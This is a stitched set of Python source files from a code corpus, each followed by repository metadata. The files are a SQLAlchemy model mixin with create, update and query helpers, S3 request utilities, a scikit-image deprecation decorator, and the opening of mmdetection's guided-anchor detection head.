kwargs[attr] = rel_cls.update_or_new_all(
list_of_kwargs=val,
keys=None if rel_cls.allow_updation_based_on_unique_keys else [
rel_cls.primary_key_name()]
)
elif isinstance(val, dict):
rel_cls = cls.mapped_rel_class(attr)
mapping_col = rel.collection_class().keyfunc.name
list_of_kwargs = [
merge(v, {mapping_col: k}) for k, v in val.items()]
kwargs[attr] = {
getattr(obj, mapping_col): obj
for obj in rel_cls.update_or_new_all(
list_of_kwargs=list_of_kwargs,
keys=None if rel_cls.allow_updation_based_on_unique_keys else [
rel_cls.primary_key_name()]
)}
elif isinstance(val, dict):
rel_cls = cls.mapped_rel_class(attr)
if not rel_cls.allow_updation_based_on_unique_keys:
val['keys'] = [rel_cls.primary_key_name()]
kwargs[attr] = rel_cls.update_or_new(**val)
for attr in attrs_to_delete:
del kwargs[attr]
return kwargs
@classmethod
def pre_save_adapter(cls, data, existing_instance=None):
return data
def clone(self, dict_struct=None, commit=True):
def remove_primary_keys_from_dict_struct(klass, ds):
pk = klass.primary_key_name()
if "attrs" not in ds:
ds['attrs'] = list(class_mapper(klass).columns.keys())
if 'attrs' in ds and pk in ds['attrs']:
ds['attrs'].remove(pk)
if 'rels' in ds:
for rel_name in ds['rels']:
mapped_rel = next(
r for r in class_mapper(klass).relationships
if r.key == rel_name)
rel_class = mapped_rel.mapper.class_
ds['rels'][rel_name] = remove_primary_keys_from_dict_struct(
rel_class, ds['rels'][rel_name])
return ds
cls = self.__class__
if dict_struct is None:
dict_struct = {}
dict_struct = remove_primary_keys_from_dict_struct(cls, dict_struct)
return cls.add(
cls.new(**self.todict(dict_struct=dict_struct)), commit=commit)
def update(self, **kwargs):
"""Updates an instance.
Args:
**kwargs : Arbitrary keyword arguments. Column names are
keywords and their new values are the values.
Examples:
>>> customer.update(email="newemail@x.com", name="new")
"""
cls = type(self)
kwargs = cls.pre_save_adapter(kwargs, existing_instance=self)
kwargs = self._prepare_data_for_saving(kwargs)
for key, value in six.iteritems(kwargs):
if not hasattr(cls, key) or isinstance(getattr(cls, key), property):
continue
if key not in self._no_overwrite_:
try:
setattr(self, key, value)
except Exception as e:
print(key, value, e.message)
raise
if isinstance(getattr(self, key), OrderingList):
getattr(self, key).reorder()
elif isinstance(getattr(cls, key), AssociationProxyInstance):
target_name = getattr(cls, key).target_collection
target_rel = getattr(self, target_name)
if isinstance(target_rel, OrderingList):
target_rel.reorder()
try:
self.session.commit()
return self
except Exception as e:
self.session.rollback()
raise e
@classmethod
def filter_by(cls, **kwargs):
"""Same as SQLAlchemy's filter_by. Additionally this accepts
two special keyword arguments `limit` and `reverse` for limiting
the results and reversing the order respectively.
Args:
**kwargs: filter parameters
Examples:
>>> user = User.filter_by(email="new@x.com")
>>> shipments = Shipment.filter_by(country="India", limit=3, reverse=True)
"""
limit = kwargs.pop('limit', None)
reverse = kwargs.pop('reverse', False)
q = cls.query.filter_by(**kwargs)
if reverse:
q = q.order_by(cls.id.desc())
if limit:
q = q.limit(limit)
return q
@classmethod
def filter(cls, *criterion, **kwargs):
"""Same as SQLAlchemy's filter. Additionally this accepts
two special keyword arguments `limit` and `reverse` for limiting
the results and reversing the order respectively.
Args:
**kwargs: filter parameters
Examples:
>>> user = User.filter(User.email=="new@x.com")
>>> shipments = Order.filter(Order.price < 500, limit=3, reverse=True)
"""
limit = kwargs.pop('limit', None)
reverse = kwargs.pop('reverse', False)
q = cls.query.filter_by(**kwargs).filter(*criterion)
if reverse:
q = q.order_by(cls.id.desc())
if limit:
q = q.limit(limit)
return q
@classmethod
def count(cls, *criterion, **kwargs):
"""Returns a count of the instances meeting the specified
filter criterion and kwargs.
Examples:
>>> User.count()
500
>>> User.count(country="India")
300
>>> User.count(User.age > 50, country="India")
39
"""
if criterion or kwargs:
return cls.filter(
*criterion,
**kwargs).count()
else:
return cls.query.count()
@classmethod
def all(cls, *criterion, **kwargs):
"""Returns all the instances which fulfil the filtering
criterion and kwargs if any given.
Examples:
>>> Tshirt.all()
[tee1, tee2, tee4, tee5]
>> Tshirt.all(reverse=True, limit=3)
[tee5, tee4, tee2]
>> Tshirt.all(color="Red")
[tee4, tee2]
"""
return cls.filter(*criterion, **kwargs).all()
@classmethod
def first(cls, *criterion, **kwargs):
"""Returns the first instance found of the model class
filtered by the specified criterion and/or key word arguments.
Return None if no result found.
Examples:
>>> will = User.first(name="Will")
"""
return cls.filter(*criterion, **kwargs).first()
@classmethod
def one(cls, *criterion, **kwargs):
"""Similar to `first`. But throws an exception if
no result is found.
Examples:
>>> user = User.one(name="here")
Raises:
NoResultFound: No row was found for one()
"""
return cls.filter(*criterion, **kwargs).one()
@classmethod
def last(cls, *criterion, **kwargs):
"""Returns the last instance matching the criterion and/or
keyword arguments.
Examples:
last_male_user = User.last(gender="male")
"""
kwargs['reverse'] = True
return cls.first(*criterion, **kwargs)
@classmethod
def new(cls, **kwargs):
"""Returns a new, unsaved instance of the model class.
"""
kwargs = cls.pre_save_adapter(kwargs)
if cls.__mapper__.polymorphic_on is not None:
discriminator_key = cls.__mapper__.polymorphic_on.name
discriminator_val = kwargs.get(discriminator_key)
if discriminator_val is not None and discriminator_val in cls.__mapper__.polymorphic_map:
actual_cls = cls.__mapper__.polymorphic_map[discriminator_val].class_
return actual_cls(
**subdict(
actual_cls._prepare_data_for_saving(kwargs),
actual_cls.all_settable_keys())
)
return cls(**subdict(cls._prepare_data_for_saving(kwargs), cls.all_settable_keys()))
@classmethod
def add(cls, model, commit=True):
"""Adds a model instance to session and commits the
transaction.
Args:
model: The instance to add.
Examples:
>>> customer = Customer.new(name="hari", email="hari@gmail.com")
>>> Customer.add(customer)
hari@gmail.com
"""
if not isinstance(model, cls):
raise ValueError('%s is not of type %s' % (model, cls))
cls.session.add(model)
try:
if commit:
cls.session.commit()
return model
except:
cls.session.rollback()
raise
@classmethod
def add_all(cls, models, commit=True, check_type=False):
"""Batch method for adding a list of model instances
to the db in one get_or_404.
Args:
models (list): A list of the instances to add.
commit (bool, optional): Defaults to True. If False, the
transaction won't get committed.
check_type (bool, optional) : If True, each instance
is type checked and exception is thrown if it is
not an instance of the model. By default, False.
Returns:
list: A list of `Model` instances
"""
if check_type:
for model in models:
if not isinstance(model, cls):
raise ValueError('%s is not of type %s' (model, cls))
if None in models:
cls.session.add_all([m for m in models if m is not None])
else:
cls.session.add_all(models)
try:
if commit:
cls.session.commit()
return models
except:
cls.session.rollback()
raise
@classmethod
def _get(cls, key, keyval, user_id=None):
result = cls.query.filter(
getattr(cls, key) == keyval)
if user_id and hasattr(cls, 'user_id'):
result = result.filter(cls.user_id == user_id)
return result.one()
@classmethod
def get(cls, keyval, key='id', user_id=None):
"""Fetches a single instance which has value `keyval`
for the attribute `key`.
Args:
keyval: The value of the attribute.
key (str, optional): The attribute to search by. By default,
it is 'id'.
Returns:
A model instance if found. Else None.
Examples:
>>> User.get(35)
user35@i.com
>>> User.get('user35@i.com', key='email')
user35@i.com
"""
if keyval is None:
return None
if (key in cls.__table__.columns
and cls.__table__.columns[key].primary_key):
# if user_id and hasattr(cls, 'user_id'):
# return cls.query.filter_by(id=keyval, user_id=user_id).first()
return cls.query.get(keyval)
else:
result = cls.query.filter(
getattr(cls, key) == keyval)
# if user_id and hasattr(cls, 'user_id'):
# result = result.filter(cls.user_id == user_id)
return result.first()
@classmethod
def get_all(cls, keyvals, key=None):
"""Works like a map function from keyvals to instances.
Args:
keyvals(list): The list of values of the attribute.
key (str, optional): The attribute to search by. By default, it is
the primary key of the model.
Returns:
list: A list of model instances, in the same order as the list of
keyvals.
Examples:
>>> User.get_all([2,5,7, 8000, 11])
user2@i.com, user5@i.com, user7@i.com, None, user11@i.com
>>> User.get_all(['user35@i.com', 'user5@i.com'], key='email')
user35@i.com, user5@i.com
"""
if len(keyvals) == 0:
return []
if key is None:
key = cls.primary_key_name()
id_attr = getattr(cls, key)
keyvals = [cast_as_column_type(v, id_attr) for v in keyvals]
original_keyvals = keyvals
keyvals_set = list(set(keyvals))
resultset = cls.query.filter(id_attr.in_(keyvals_set))
# We need the results in the same order as the input keyvals
# So order by field in SQL
key_result_mapping = {
getattr(result, key): result for result in resultset.all()}
return [key_result_mapping.get(kv) for kv in original_keyvals]
@classmethod
def get_or_404(cls, id):
"""Same as Flask-SQLAlchemy's `get_or_404`.
"""
return cls.query.get_or_404(id)
@classmethod
def create(cls, **kwargs):
"""Initializes a new instance, adds it to the db and commits
the transaction.
Args:
**kwargs: The keyword arguments for the init constructor.
Examples:
>>> user = User.create(name="Vicky", email="vicky@h.com")
>>> user.id
35
"""
try:
return cls.add(cls.new(**kwargs))
except:
cls.session.rollback()
raise
@classmethod
def find_or_create(cls, **kwargs):
"""Checks if an instance already exists by filtering with the
kwargs. If yes, returns that instance. If not, creates a new
instance with kwargs and returns it
Args:
**kwargs: The keyword arguments which are used for filtering
and initialization.
keys(list, optional): A special keyword argument.
If passed, only the set of keys mentioned here will be used
for filtering. Useful when we want to 'find' based on a subset
of the keys and create with all the keys
Examples:
>>> customer = Customer.find_or_create(
... name="vicky", email="vicky@h.com", country="India")
>>> customer.id
45
>>> customer1 = Customer.find_or_create(
... name="vicky", email="vicky@h.com", country="India")
>>> customer1==customer
True
>>> customer2 = Customer.find_or_create(
... name="vicky", email="vicky@h.com", country="Russia")
>>> customer2==customer
False
>>> customer3 = Customer.find_or_create(
... name="vicky", email="vicky@h.com", country="Russia",
... keys=['name', 'email'])
>>> customer3==customer
True
"""
keys = kwargs.pop('keys') if 'keys' in kwargs else []
return cls.first(**subdict(kwargs, keys)) or cls.create(**kwargs)
@classmethod
def get_updated_or_new_obj(cls, kwargs=None, filter_keys=None):
if filter_keys is None:
filter_keys = []
if kwargs is None:
kwargs = {}
filter_kwargs = subdict(kwargs, filter_keys)
if filter_kwargs == {}:
obj = None
else:
obj = cls.first(**filter_kwargs)
if obj is not None:
update_kwargs = {
k: v for k, v in six.iteritems(kwargs)
if k not in filter_keys and k not in cls._no_overwrite_}
obj.update_without_commit(**update_kwargs)
# for key, value in kwargs.iteritems():
# if (key not in filter_keys and
# key not in cls._no_overwrite_):
# setattr(obj, key, value)
else:
obj = cls.new(**kwargs)
return obj
@classmethod
def get_matching_obj_using_unique_keys(cls, kwargs):
primary_key_name = cls.primary_key_name()
if primary_key_name in kwargs:
matching_data = subdict(kwargs, [primary_key_name])
obj = cls.first(**matching_data) if matching_data else None
if obj:
return obj
for k in cls.unique_column_names():
if k in kwargs and k != primary_key_name:
matching_data = subdict(kwargs, [k])
obj = cls.first(**matching_data) if matching_data else None
if obj:
return obj
for col_name_tuple in cls.unique_constraint_col_name_tuples():
if all(c in kwargs for c in col_name_tuple):
matching_data = subdict(kwargs, col_name_tuple)
obj = cls.first(**matching_data) if matching_data else None
if obj:
return obj
return None
@classmethod
def update_matching_obj_or_generate_new_obj(cls, kwargs):
obj = cls.get_matching_obj_using_unique_keys(kwargs)
if obj is not None:
update_kwargs = {
k: v for k, v in six.iteritems(kwargs)
if k not in cls._no_overwrite_}
obj.update_without_commit(**update_kwargs)
else:
obj = cls.new(**kwargs)
return obj
@classmethod
def update_or_new(cls, **kwargs):
keys = kwargs.pop('keys') if 'keys' in kwargs else []
if keys is None or len(keys) == 0:
return cls.update_matching_obj_or_generate_new_obj(kwargs)
return cls.get_updated_or_new_obj(kwargs, keys)
@classmethod
def update_or_new_all(cls, list_of_kwargs, keys=None):
objs = []
if keys is None:
keys = []
if keys is None or len(keys) == 0:
return [
cls.update_matching_obj_or_generate_new_obj(kwargs)
for kwargs in list_of_kwargs
]
for kwargs in list_of_kwargs:
objs.append(cls.get_updated_or_new_obj(kwargs, keys))
return objs
@classmethod
def update_or_build(cls, **kwargs):
keys = kwargs.pop('keys') if 'keys' in kwargs else []
filter_kwargs = subdict(kwargs, keys)
if filter_kwargs == {}:
obj = None
else:
obj = cls.first(**filter_kwargs)
if obj is not None:
for key, value in six.iteritems(kwargs):
if (key not in keys and
key not in cls._no_overwrite_):
setattr(obj, key, value)
else:
obj = cls.build(**kwargs)
return obj
@classmethod
def update_or_create(cls, **kwargs):
"""Checks if an instance already exists by filtering with the
kwargs. If yes, updates the instance with new kwargs and
returns that instance. If not, creates a new
instance with kwargs and returns it.
Args:
**kwargs: The keyword arguments which are used for filtering
and initialization.
keys (list, optional): A special keyword argument. If passed,
only the set of keys mentioned here will be used for filtering.
Useful when we want to 'filter' based on a subset of the keys
and create with all the keys.
Examples:
>>> customer = Customer.update_or_create(
... name="vicky", email="vicky@h.com", country="India")
>>> customer.id
45
>>> customer1 = Customer.update_or_create(
... name="vicky", email="vicky@h.com", country="India")
>>> customer1==customer
True
>>> customer2 = Customer.update_or_create(
... name="vicky", email="vicky@h.com", country="Russia")
>>> customer2==customer
False
>>> customer3 = Customer.update_or_create(
... name="vicky", email="vicky@h.com", country="Russia",
... keys=['name', 'email'])
>>> customer3==customer
True
"""
keys = kwargs.pop('keys') if 'keys' in kwargs else []
filter_kwargs = subdict(kwargs, keys)
if filter_kwargs == {}:
obj = None
else:
obj = cls.first(**filter_kwargs)
if obj is not None:
for key, value in six.iteritems(kwargs):
if (key not in keys and
key not in cls._no_overwrite_):
setattr(obj, key, value)
try:
cls.session.commit()
except:
cls.session.rollback()
raise
else:
obj = cls.create(**kwargs)
return obj
@classmethod
def create_all(cls, list_of_kwargs):
"""Batch method for creating a list of instances
Args:
list_of_kwargs(list of dicts): hereA list of dicts where
each dict denotes the keyword args that you would pass
to the create method separately
Examples:
>>> Customer.create_all([
... {'name': 'Vicky', 'age': 34, 'user_id': 1},
... {'name': 'Ron', 'age': 40, 'user_id': 1, 'gender': 'Male'}])
"""
try:
return cls.add_all([
cls.new(**kwargs) if kwargs is not None else None for kwargs in list_of_kwargs])
except:
cls.session.rollback()
raise
@classmethod
def find_or_create_all(cls, list_of_kwargs, keys=[]):
"""Batch method for querying for a list of instances and
creating them if required
Args:
list_of_kwargs(list of dicts): A list of dicts where
each dict denotes the keyword args that you would pass
to the create method separately
keys (list, optional): A list of keys to use for the
initial finding step. Matching is done only on these
attributes.
Examples:
>>> Customer.find_or_create_all([
... {'name': 'Vicky', 'email': 'vicky@x.com', 'age': 34},
... {'name': 'Ron', 'age': 40, 'email': 'ron@x.com',
... 'gender': 'Male'}], keys=['name', 'email'])
"""
list_of_kwargs_wo_dupes, markers = remove_and_mark_duplicate_dicts(
list_of_kwargs, keys)
added_objs = cls.add_all([
cls.first(**subdict(kwargs, keys)) or cls.new(**kwargs)
for kwargs in list_of_kwargs_wo_dupes])
result_objs = []
iterator_of_added_objs = iter(added_objs)
for idx in range(len(list_of_kwargs)):
if idx in markers:
result_objs.append(added_objs[markers[idx]])
else:
result_objs.append(next(
iterator_of_added_objs))
return result_objs
@classmethod
def update_or_create_all(cls, list_of_kwargs, keys=[]):
"""Batch method for updating a list of instances and
creating them if required
Args:
list_of_kwargs(list of dicts): A list of dicts where
each dict denotes the keyword args that you would pass
to the create method separately
keys (list, optional): A list of keys to use for the
initial finding step. Matching is done only on these
attributes.
Examples:
>>> Customer.update_or_create_all([
... {'name': 'Vicky', 'email': 'vicky@x.com', 'age': 34},
... {'name': 'Ron', 'age': 40, 'email': 'ron@x.com',
... 'gender': 'Male'}], keys=['name', 'email'])
"""
objs = []
for kwargs in list_of_kwargs:
filter_kwargs = subdict(kwargs, keys)
if filter_kwargs == {}:
obj = None
else:
obj = cls.first(**filter_kwargs)
if obj is not None:
for key, value in six.iteritems(kwargs):
if (key not in keys and
key not in cls._no_overwrite_):
setattr(obj, key, value)
else:
obj = cls.new(**kwargs)
objs.append(obj)
try:
return cls.add_all(objs)
except:
cls.session.rollback()
raise
@classmethod
def update_or_build_all(cls, list_of_kwargs, keys=[]):
"""Batch method for updating a list of instances and
creating them if required
Args:
list_of_kwargs(list of dicts): A list of dicts where
each dict denotes the keyword args that you would pass
to the create method separately
keys (list, optional): A list of keys to use for the
initial finding step. Matching is done only on these
attributes.
Examples:
>>> Customer.update_or_create_all([
... {'name': 'Vicky', 'email': 'vicky@x.com', 'age': 34},
... {'name': 'Ron', 'age': 40, 'email': 'ron@x.com',
... 'gender': 'Male'}], keys=['name', 'email'])
"""
objs = []
for kwargs in list_of_kwargs:
filter_kwargs = subdict(kwargs, keys)
if filter_kwargs == {}:
obj = None
else:
obj = cls.first(**filter_kwargs)
if obj is not None:
for key, value in six.iteritems(kwargs):
if (key not in keys and
key not in cls._no_overwrite_):
setattr(obj, key, value)
else:
obj = cls.new(**kwargs)
objs.append(obj)
try:
return cls.add_all(objs, commit=False)
except:
cls.session.rollback()
raise
@classmethod
def build(cls, **kwargs):
"""Similar to create. But the transaction is not committed
Args:
**kwargs : The keyword arguments for the constructor
Returns:
A model instance which has been added to db session. But session
transaction has not been committed yet.
"""
return cls.add(cls.new(**kwargs), commit=False)
@classmethod
def find_or_build(cls, **kwargs):
"""Checks if an instance already exists in db with these kwargs else
returns a new, saved instance of the service's model class.
Args:
**kwargs: instance parameters
"""
keys = kwargs.pop('keys') if 'keys' in kwargs else []
return cls.first(**subdict(kwargs, keys)) or cls.build(**kwargs)
@classmethod
def find_or_new(cls, **kwargs):
keys = kwargs.pop('keys') if 'keys' in kwargs else []
return cls.first(**subdict(kwargs, keys)) or cls.new(**kwargs)
@classmethod
def new_all(cls, list_of_kwargs):
return [cls.new(**kwargs) for kwargs in list_of_kwargs]
@classmethod
def find_or_new_all(cls, list_of_kwargs, keys=[]):
return [cls.first(**subdict(kwargs, keys)) or cls.new(**kwargs) for kwargs in list_of_kwargs]
@classmethod
def build_all(cls, list_of_kwargs):
"""Similar to `create_all`. But transaction is not committed.
"""
return cls.add_all([
cls.new(**kwargs) for kwargs in list_of_kwargs], commit=False)
@classmethod
def find_or_build_all(cls, list_of_kwargs):
"""Similar to `find_or_create_all`. But transaction is not committed.
"""
return cls.add_all([cls.first(**kwargs) or cls.new(**kwargs)
for kwargs in list_of_kwargs], commit=False)
@classmethod
def update_all(cls, *criterion, **kwargs):
"""Batch method for updating all instances obeying the criterion
Args:
*criterion: SQLAlchemy query criterion for filtering what
instances to update
**kwargs: The parameters to be updated
Examples:
>>> User.update_all(active=True)
>>> Customer.update_all(Customer.country=='India', active=True)
The second example sets active=True for all customers with
country India.
"""
try:
r = cls.query.filter(*criterion).update(kwargs, 'fetch')
cls.session.commit()
return r
except:
cls.session.rollback()
raise
@classmethod
def get_and_update(cls, id, **kwargs):
"""Returns an updated instance of the service's model class.
Args:
model: the model to update
**kwargs: update parameters
"""
model = cls.get(id)
for k, v in cls._prepare_data_for_saving(kwargs).items():
setattr(model, k, v)
cls.session.commit()
return model
@classmethod
def get_and_setattr(cls, id, **kwargs):
"""Returns an updated instance of the service's model class.
Args:
model: the model to update
**kwargs: update parameters
"""
model = cls.get(id)
for k, v in cls._prepare_data_for_saving(kwargs).items():
setattr(model, k, v)
return model
@classmethod
def buckets(cls, bucket_size=None):
return cls.query.buckets(bucket_size=bucket_size)
| 33.753052 | 102 | 0.556375 |
acdf9b12be2aa2163b5a3f24258aa1896bb98126 | 7,279 | py | Python | sfcsmCtrl/S3/utils.py | chenhui0228/sfcsm | ef9adbc7d2ec8d97cee053678002b65ca41b804b | [
"Apache-2.0"
] | 1 | 2018-06-04T06:26:27.000Z | 2018-06-04T06:26:27.000Z | sfcsmCtrl/S3/utils.py | chenhui0228/sfcsm | ef9adbc7d2ec8d97cee053678002b65ca41b804b | [
"Apache-2.0"
] | null | null | null | sfcsmCtrl/S3/utils.py | chenhui0228/sfcsm | ef9adbc7d2ec8d97cee053678002b65ca41b804b | [
"Apache-2.0"
] | null | null | null | """Misc. S3-related utilities."""
# original work by Ludvig Ericson (https://github.com/lericson/simples3)
# Copyright (c) 2008, Ludvig Ericson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import time
import hashlib
import datetime
import mimetypes
from base64 import b64encode
from urllib import quote
from calendar import timegm
def _amz_canonicalize(headers):
r"""Canonicalize AMZ headers in that certain AWS way.
>>> _amz_canonicalize({"x-amz-test": "test"})
'x-amz-test:test\n'
>>> _amz_canonicalize({"x-amz-first": "test",
... "x-amz-second": "hello"})
'x-amz-first:test\nx-amz-second:hello\n'
>>> _amz_canonicalize({})
''
"""
rv = {}
for header, value in headers.iteritems():
header = header.lower()
if header.startswith("x-amz-"):
rv.setdefault(header, []).append(value)
parts = []
for key in sorted(rv):
parts.append("%s:%s\n" % (key, ",".join(rv[key])))
return "".join(parts)
def metadata_headers(metadata):
return dict(("X-AMZ-Meta-" + h, v) for h, v in metadata.iteritems())
def headers_metadata(headers):
return dict((h[11:], v) for h, v in headers.iteritems()
if h.lower().startswith("x-amz-meta-"))
iso8601_fmt = '%Y-%m-%dT%H:%M:%S.000Z'
def _iso8601_dt(v): return datetime.datetime.strptime(v, iso8601_fmt)
def rfc822_fmtdate(t=None):
from email.utils import formatdate
if t is None:
t = datetime.datetime.utcnow()
return formatdate(timegm(t.timetuple()), usegmt=False)
def rfc822_parsedate(v):
from email.utils import parsedate
return datetime.datetime.fromtimestamp(time.mktime(parsedate(v)))
def expire2datetime(expire, base=None):
"""Force *expire* into a datetime relative to *base*.
If expire is a relatively small integer, it is assumed to be a delta in
seconds. This is possible for deltas up to 10 years.
If expire is a delta, it is added to *base* to yield the expire date.
If base isn't given, the current time is assumed.
>>> base = datetime.datetime(1990, 1, 31, 1, 2, 3)
>>> expire2datetime(base) == base
True
>>> expire2datetime(3600 * 24, base=base) - base
datetime.timedelta(1)
>>> import time
>>> expire2datetime(time.mktime(base.timetuple())) == base
True
"""
if hasattr(expire, "timetuple"):
return expire
if base is None:
base = datetime.datetime.now()
# *expire* is not a datetime object; try interpreting it
# as a timedelta, a UNIX timestamp or offsets in seconds.
try:
return base + expire
except TypeError:
# Since the operands could not be added, reinterpret
# *expire* as a UNIX timestamp or a delta in seconds.
# This is rather arbitrary: 10 years are allowed.
unix_eighties = 315529200
if expire < unix_eighties:
return base + datetime.timedelta(seconds=expire)
else:
return datetime.datetime.fromtimestamp(expire)
def aws_md5(data):
"""Make an AWS-style MD5 hash (digest in base64)."""
hasher = hashlib.new("md5")
if hasattr(data, "read"):
data.seek(0)
while True:
chunk = data.read(8192)
if not chunk:
break
hasher.update(chunk)
data.seek(0)
else:
hasher.update(data)
return b64encode(hasher.digest()).decode("ascii")
def aws_urlquote(value):
r"""AWS-style quote a URL part.
>>> aws_urlquote("/bucket/a key")
'/bucket/a%20key'
"""
if isinstance(value, unicode):
value = value.encode("utf-8")
return quote(value, "/")
def guess_mimetype(fn, default="application/octet-stream"):
"""Guess a mimetype from filename *fn*.
>>> guess_mimetype("foo.txt")
'text/plain'
>>> guess_mimetype("foo")
'application/octet-stream'
"""
if "." not in fn:
return default
bfn, ext = fn.lower().rsplit(".", 1)
if ext == "jpg": ext = "jpeg"
return mimetypes.guess_type(bfn + "." + ext)[0] or default
def info_dict(headers):
rv = {"headers": headers, "metadata": headers_metadata(headers)}
if "content-length" in headers:
rv["size"] = int(headers["content-length"])
if "content-type" in headers:
rv["mimetype"] = headers["content-type"]
if "date" in headers:
rv["date"] = rfc822_parsedate(headers["date"])
if "last-modified" in headers:
rv["modify"] = rfc822_parsedate(headers["last-modified"])
return rv
def name(o):
"""Find the name of *o*.
Functions:
>>> name(name)
'simples3.utils.name'
>>> def my_fun(): pass
>>> name(my_fun)
'simples3.utils.my_fun'
Classes:
>>> class MyKlass(object): pass
>>> name(MyKlass)
'simples3.utils.MyKlass'
Instances:
>>> name(MyKlass())
'simples3.utils.MyKlass'
Types:
>>> name(str), name(object), name(int)
('str', 'object', 'int')
Type instances:
>>> name("Hello"), name(True), name(None), name(Ellipsis)
('str', 'bool', 'NoneType', 'ellipsis')
"""
if hasattr(o, "__name__"):
rv = o.__name__
modname = getattr(o, "__module__", None)
# This work-around because Python does it itself,
# see typeobject.c, type_repr.
# Note that Python only checks for __builtin__.
if modname not in (None, "", "__builtin__", "builtins"):
rv = o.__module__ + "." + rv
else:
for o in getattr(o, "__mro__", o.__class__.__mro__):
rv = name(o)
# If there is no name for the this baseclass, this ensures we check
# the next rather than say the object has no name (i.e., return
# None)
if rv is not None:
break
return rv
| 34.827751 | 82 | 0.6233 |
acdf9c16bd58d68a21c2aad2dc5c74c7382aa49e | 1,596 | py | Python | skimage/_shared/utils.py | RKDSOne/scikit-image | baa67eafcace9cde1b94ad2d467e2f2e0468e759 | [
"BSD-3-Clause"
] | 1 | 2020-12-27T18:42:22.000Z | 2020-12-27T18:42:22.000Z | skimage/_shared/utils.py | RKDSOne/scikit-image | baa67eafcace9cde1b94ad2d467e2f2e0468e759 | [
"BSD-3-Clause"
] | null | null | null | skimage/_shared/utils.py | RKDSOne/scikit-image | baa67eafcace9cde1b94ad2d467e2f2e0468e759 | [
"BSD-3-Clause"
] | 2 | 2015-12-29T17:04:26.000Z | 2020-10-17T15:47:30.000Z | import warnings
import functools
__all__ = ['deprecated']
class deprecated(object):
"""Decorator to mark deprecated functions with warning.
Adapted from <http://wiki.python.org/moin/PythonDecoratorLibrary>.
Parameters
----------
alt_func : str
If given, tell user what function to use instead.
behavior : {'warn', 'raise'}
Behavior during call to deprecated function: 'warn' = warn user that
function is deprecated; 'raise' = raise error.
"""
def __init__(self, alt_func=None, behavior='warn'):
self.alt_func = alt_func
self.behavior = behavior
def __call__(self, func):
alt_msg = ''
if self.alt_func is not None:
alt_msg = ' Use `%s` instead.' % self.alt_func
msg = 'Call to deprecated function `%s`.' % func.__name__
msg += alt_msg
@functools.wraps(func)
def wrapped(*args, **kwargs):
if self.behavior == 'warn':
warnings.warn_explicit(msg,
category=DeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1)
elif self.behavior == 'raise':
raise DeprecationWarning(msg)
return func(*args, **kwargs)
# modify doc string to display deprecation warning
doc = '**Deprecated function**.' + alt_msg
if wrapped.__doc__ is None:
wrapped.__doc__ = doc
else:
wrapped.__doc__ = doc + '\n\n' + wrapped.__doc__
return wrapped
| 29.555556 | 76 | 0.587719 |
acdf9d94dbfb3939feefc56870f4c73e9f575207 | 25,307 | py | Python | mmdet/models/anchor_heads/guided_anchor_head.py | thangvubk/Cascade-RPN | c832973b8d849acbe4c0ebf75f353c7f48ec457b | [
"Apache-2.0"
] | 184 | 2019-09-14T13:58:10.000Z | 2022-03-28T14:25:47.000Z | mmdet/models/anchor_heads/guided_anchor_head.py | XiaoShuhong/Cascade-RPN | c832973b8d849acbe4c0ebf75f353c7f48ec457b | [
"Apache-2.0"
] | 21 | 2019-09-23T12:25:26.000Z | 2021-03-13T18:22:15.000Z | mmdet/models/anchor_heads/guided_anchor_head.py | XiaoShuhong/Cascade-RPN | c832973b8d849acbe4c0ebf75f353c7f48ec457b | [
"Apache-2.0"
] | 18 | 2019-10-08T00:52:00.000Z | 2021-01-04T12:49:37.000Z | from __future__ import division
import numpy as np
import torch
import torch.nn as nn
from mmcv.cnn import normal_init
from mmdet.core import (AnchorGenerator, anchor_inside_flags, anchor_target,
delta2bbox, force_fp32, ga_loc_target, ga_shape_target,
multi_apply, multiclass_nms)
from mmdet.ops import DeformConv, MaskedConv2d
from ..builder import build_loss
from ..registry import HEADS
from ..utils import bias_init_with_prob
from .anchor_head import AnchorHead
class FeatureAdaption(nn.Module):
"""Feature Adaption Module.
Feature Adaption Module is implemented based on DCN v1.
It uses anchor shape prediction rather than feature map to
predict offsets of deformable conv layer.
Args:
in_channels (int): Number of channels in the input feature map.
out_channels (int): Number of channels in the output feature map.
kernel_size (int): Deformable conv kernel size.
deformable_groups (int): Deformable conv group size.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size=3,
deformable_groups=4):
super(FeatureAdaption, self).__init__()
offset_channels = kernel_size * kernel_size * 2
self.conv_offset = nn.Conv2d(
2, deformable_groups * offset_channels, 1, bias=False)
self.conv_adaption = DeformConv(
in_channels,
out_channels,
kernel_size=kernel_size,
padding=(kernel_size - 1) // 2,
deformable_groups=deformable_groups)
self.relu = nn.ReLU(inplace=True)
def init_weights(self):
normal_init(self.conv_offset, std=0.1)
normal_init(self.conv_adaption, std=0.01)
def forward(self, x, shape):
offset = self.conv_offset(shape.detach())
x = self.relu(self.conv_adaption(x, offset))
return x
@HEADS.register_module
class GuidedAnchorHead(AnchorHead):
"""Guided-Anchor-based head (GA-RPN, GA-RetinaNet, etc.).
This GuidedAnchorHead will predict high-quality feature guided
anchors and locations where anchors will be kept in inference.
There are mainly 3 categories of bounding-boxes.
